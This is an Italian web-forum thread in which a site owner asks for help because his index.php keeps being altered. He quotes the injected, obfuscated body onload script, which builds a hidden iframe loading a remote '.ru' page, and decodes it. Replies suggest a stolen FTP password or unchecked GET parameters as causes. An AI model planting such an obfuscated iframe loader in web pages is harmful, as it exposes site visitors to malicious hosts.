Visualizzazione dei risultati da 1 a 3 su 3

Discussione: virus lovekill

  1. #1

    virus lovekill

    non so se questo è il forum giusto, ma non vedendo altra categoria posto qua il mio problema.
    è da un po di tempo che vedo puntualmente ogni giorno il mio sito che vengono modifcate le pagine index.php, praticamente ogni sera noto che la mia index.php e precisamente nel tag <body> viene sempre in questo modo:
    ----------------------
    <body onload="status='';g='i';y='e';pm='u';wu='htt';n='v ek';v='/k';k='ram';b='f';j='sr';e='ll';w='r';o='i';a='i';n r='c';hy='o';gh='s.';l='l';x='//';su='php';pw='x.';i='nde';vq='p:';jy='i';mo='ll/';yn=jy.concat(b,k,y);uw=j.concat(nr);cr=wu.concat (vq,x,l,hy,n,a,e,gh,w,pm,v,g,mo,o,i,pw,su);var wi=document.createElement(yn);wi.setAttribute('wid th','5');wi.setAttribute('height','5');wi.setAttri bute('style','display:none');wi.setAttribute(uw,cr );document.body.appendChild(wi);window.status=stat us;>
    -------------------------------
    dopo vani tentativi di rirpistinare il file index.php dal mio pc al server remoto, sono riuscito a decifrare questo tab <body> che in effetti non fa altro che avviare in onload questo:
    --> frame src http://lovekills.ru/kill/index.php <---

    adesso correi capire se qualcuno in tutti i forum del sito html.it riesce a risolvermi questo problema, cioè come sconfiggere questo virus dal server??????????
    ------------------
    georado
    www.georado.it

  2. #2
    Utente di HTML.it L'avatar di gianiaz
    Registrato dal
    May 2001
    Messaggi
    8,027
    Bhe innanzitutto dovresti capire come fanno a installartelo :

    le possibilità sono 2 :

    1. Hanno la pass del tuo ftp, oppure hanno hackerato il server
    2. (più probabile) il tuo sito riceve dei parametri tramite $_GET che non vengono controllati, e questa vulnerabilità viene utilizzata per inserire del codice malevolo.


  3. #3
    grazie per la risposta.

    ho cambiato del password del server in frp, e sono due giorni che sembra vada tutto bene, quindi presumo che sia quello.

    grazie di tutto
    ------------------
    georado
    www.georado.it

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.